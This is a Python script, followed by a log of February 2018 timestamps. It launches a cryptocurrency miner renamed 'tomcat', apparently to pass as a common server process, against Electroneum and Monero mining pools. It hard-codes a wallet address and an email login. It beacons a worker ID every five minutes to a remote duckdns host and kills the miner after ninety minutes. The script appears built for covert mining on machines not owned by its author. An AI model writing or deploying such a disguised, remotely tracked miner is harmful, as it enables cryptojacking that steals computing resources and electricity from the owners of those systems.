import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:07.749353
#2018-02-17 16:06:07.576948
#2018-02-17 17:54:01.533906
#2018-02-17 19:41:07.663402
#2018-02-17 21:29:05.879820
#2018-02-17 23:13:07.219906
#2018-02-18 01:00:09.880819
#2018-02-18 02:49:04.796508
#2018-02-18 04:38:07.872830
#2018-02-18 06:28:06.435925
#2018-02-18 08:18:08.321595
#2018-02-18 10:06:04.409533
#2018-02-18 11:52:06.214201
#2018-02-18 13:37:05.166875
#2018-02-18 15:27:03.936924
#2018-02-18 17:16:07.226656
#2018-02-18 19:04:04.903543
#2018-02-18 20:51:05.146339
#2018-02-18 22:38:04.135801
#2018-02-19 00:27:04.872644
#2018-02-19 02:12:06.030586
#2018-02-19 03:58:05.530474
#2018-02-19 05:42:07.198931
#2018-02-19 07:30:01.644707
#2018-02-19 09:20:01.365182
#2018-02-19 11:09:01.447354
#2018-02-19 12:55:09.686484
#2018-02-19 14:42:11.154563
#2018-02-19 16:29:08.957649
#2018-02-19 18:15:10.431911
#2018-02-19 20:03:07.301601
#2018-02-19 21:53:01.615202
#2018-02-19 23:38:07.983367
#2018-02-20 01:24:07.244431
#2018-02-20 03:14:02.020959
#2018-02-20 05:01:04.427648
#2018-02-20 06:43:07.432111
#2018-02-20 08:28:07.872615
#2018-02-20 10:13:07.610016
#2018-02-20 11:58:01.393268
#2018-02-20 13:45:10.274391
#2018-02-20 15:33:05.086068
#2018-02-20 17:19:01.550370
#2018-02-20 19:08:04.458490
#2018-02-20 20:56:06.470641
#2018-02-20 22:42:04.276318
#2018-02-21 00:24:05.975996
#2018-02-21 02:09:01.595591
#2018-02-21 03:57:01.836424
#2018-02-21 05:44:05.572438
#2018-02-21 07:32:07.124805
#2018-02-21 09:17:05.486346
#2018-02-21 11:05:06.424957
#2018-02-21 12:53:02.018846
#2018-02-21 14:40:10.166055
#2018-02-21 16:27:06.654962
#2018-02-21 18:19:07.356270
#2018-02-21 20:05:08.193998
#2018-02-21 21:52:05.579496
#2018-02-21 23:40:09.009238
#2018-02-22 01:30:10.516156
#2018-02-22 03:19:01.347171
#2018-02-22 05:06:06.137391
#2018-02-22 06:49:05.324753
#2018-02-22 08:37:01.892831
#2018-02-22 10:24:07.047319
#2018-02-22 12:09:09.536717
#2018-02-22 13:54:01.808074
#2018-02-22 15:42:04.426620
#2018-02-22 17:27:07.837053
#2018-02-22 19:16:08.528929
#2018-02-22 21:09:05.331295
#2018-02-22 22:53:07.933467
#2018-02-23 00:39:07.463592
#2018-02-23 02:26:08.668672
#2018-02-23 04:14:01.544787
#2018-02-23 05:59:06.979862
#2018-02-23 07:31:08.082465
#2018-02-23 09:33:04.053588
#2018-02-23 11:16:08.626449
#2018-02-23 12:37:03.874023
#2018-02-23 14:03:08.556986
#2018-02-23 15:40:05.997370
#2018-02-23 17:10:12.733654
#2018-02-23 18:46:06.847127
#2018-02-23 20:23:04.640563
#2018-02-23 21:57:04.654199
#2018-02-23 23:32:01.908805
#2018-02-24 01:04:04.146743
#2018-02-24 02:45:06.527701
#2018-02-24 04:24:06.472580
#2018-02-24 05:51:04.704563
#2018-02-24 07:27:06.239274
#2018-02-24 08:59:05.419862
#2018-02-24 10:48:07.745865
#2018-02-24 12:35:05.927940
#2018-02-24 14:23:05.100226
#2018-02-24 16:11:02.055538
#2018-02-24 18:03:03.589676
#2018-02-24 19:50:08.389296
#2018-02-24 21:35:04.916774
#2018-02-25 00:23:01.396232
#2018-02-25 03:28:07.176446
#2018-02-25 07:11:07.345650